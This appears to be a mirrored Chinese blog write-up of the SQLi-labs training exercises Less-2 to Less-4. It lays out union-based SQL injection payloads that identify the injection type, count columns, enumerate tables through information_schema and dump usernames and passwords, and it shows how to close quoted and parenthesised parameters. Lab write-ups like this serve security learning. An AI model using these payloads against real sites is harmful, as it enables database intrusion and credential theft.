zoukankan      html  css  js  c++  java
  • Less2-Less4

    Less2
    GET_数字型注入

    0x01 判断注入类型

    ?id=1
    
    to use near ' LIMIT 0,1' at line 1
     LIMIT 0,1
    只有一个,没有单双引号,说明为数字型
    后台查询语句
    select username from users where id=1 limit 0,1
    

    0x02 判断显示字段

    ?id=1 order by 4 --+
    报错,有3列
    

    0x03 查询数据库名

    ?id=-1 union select 1,database(),user() --+
    

    0x04 查询表名

    ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+
    

    0x05 查询字段名

    ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+
    

    0x06 查询数据

    ?id=-1 union select 1,2,group_concat(username,password) from users --+
    

    Less-3
    GET_单引号_小括号_字符型注入

    0x01 判断类型

    ?id=1'
    
    use near ''1'') LIMIT 0,1' at line 1
    '1'') LIMIT 0,1
    单引号,单括号
    

    0x02 判断显示字段

    ?id=1') order by 4 --+
    

    Less-4
    GET_双引号_单括号_字符型注入

    0x01 类型判断

    ?id=1"
    
     to use near '"1"") LIMIT 0,1' at line 1
    "1"") LIMIT 0,1
    双引号,单括号
    

    0x02 闭合

    ?id=1") --+
    

  • 相关阅读:
    RocketMq(三、重试机制)
    RocketMq(二、生产者、消费者demo)
    VUE(四、ajax-axios)
    配置git DiffMerge工具
    Gerrit 删除项目
    html元素
    UML类图细节
    json 转 javaBean
    将文件的编码格式转换为utf-8
    第四篇:Eclipse Android app 工程迁移到 Android Studio
  • 原文地址:https://www.cnblogs.com/observering/p/12902465.html
Copyright © 2011-2022 走看看